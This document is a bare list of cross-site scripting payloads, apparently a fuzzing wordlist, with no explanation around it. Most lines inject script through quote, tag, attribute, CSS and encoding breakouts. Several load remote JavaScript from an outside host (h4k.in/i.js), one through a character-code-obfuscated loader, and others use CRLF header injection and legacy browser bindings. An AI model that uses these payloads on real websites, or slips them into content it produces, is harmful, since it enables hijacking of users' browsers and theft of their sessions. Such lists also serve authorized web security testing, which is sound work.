';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//--></SCRIPT>">'><SCRIPT>alert(4)</SCRIPT>=&{}");}alert(6);function xss(){//
';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//--></SCRIPT>">'></title><SCRIPT>alert(4)</SCRIPT>=&{</title><script>alert(5)</script>}");}
'';!--"<script>alert(0);</script>=&{(alert(1))}
"><script>alert(0);</script>
'><script>alert(0);</script>
'<script>alert(0);</script>
<img src=x onerror=;;alert(1) />
</title><script>alert(1)</script>
`> <script>alert(5)</script>
</textarea><br><code onmouseover=a=eval;b=alert;a(b(/g/.source));>MOVE MOUSE OVER THIS AREA</code>
</noscript><br><code onmouseover=a=eval;b=alert;a(b(/h/.source));>MOVE MOUSE OVER THIS AREA</code>
}</style><script>a=eval;b=alert;a(b(/i/.source));</script>
;}alert(0);{
"+alert(0)+"
xyz onerror=alert(6); 
onclick=eval/**/(/ale/.source%2b/rt/.source%2b/(7)/.source);
a=eval;b=alert;a(b(8));
a=1;a=eval;b=alert;a(b(11));//
';//%0da=eval;b=alert;a(b(9));//
";//%0da=eval;b=alert;a(b(10));//
'};a=eval;b=alert;a(b(13));//
"};a=eval;b=alert;a(b(12));//
1};a=eval;b=alert;a(b(14));//
'];a=eval;b=alert;a(b(15));//
"];a=eval;b=alert;a(b(16));//
1];a=eval;b=alert;a(b(17));//
1;a=eval;b=alert;a(b(/c/.source));
%0da=eval;b=alert;a(b(/d/.source));
*/a=eval;b=alert;a(b(/e/.source));/*
<script src=//h4k.in
<script src=http://h4k.in/>
<script src=//h4k.in></script>
"><script src=//h4k.in></script><
<scri
pt src=//h4k.in><
></script>
<s>000<s>%3cs%3e111%3c/s%3e%3c%73%3e%32%32%32%3c%2f%73%3e&#60&#115&#62&#51&#51&#51&#60&#47&#115&#62&#x3c&#x73&#x3e&#x34&#x34&#x34&#x3c&#x2f&#x73&#x3e
"><script src=http://h4k.in/i.js></script>
"><script>a=document.createElement('script');a.src='http://h4k.in/i.js';document.body.appendChild(a);</script>
"><script>eval(String.fromCharCode(97,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,97,46,115,114,99,61,39,104,116,116,112,58,47,47,104,52,107,46,105,110,47,105,46,106,115,39,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,97,41,59))</script>
vbscript:Execute(MsgBox(chr(88)&chr(83)&chr(83)))
" style="color: expression(alert(0));" a="
</a style=""xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://h4k.in/i.js')">
<img src=`x` onrerror= ` ;; alert(1) ` />
" style="-moz-binding:url(http://h4k.in/mozxss.xml#xss);" a="
" sstyle="foobar"tstyle="foobar"ystyle="foobar"lstyle="foobar"estyle="foobar"=-moz-binding:url(http://h4k.in/mozxss.xml#xss)>foobar</b>#xss)" a="
%0aContent-Type:text/html%0a%0a%3cscript%3ealert(0)%3c/script%3ehttp://www.google.de/
c%00""<script>alert(0);</script>
BODY{-moz-binding:url("http://h4k.in/mozxss.xml%23xss")}
x=alert;x(%26%2340 /finally through!/.source %26%2341);
%26%2339);x=alert;x(%26%2340 /finally through!/.source %26%2341);//
http://aa<script>alert(123)</script>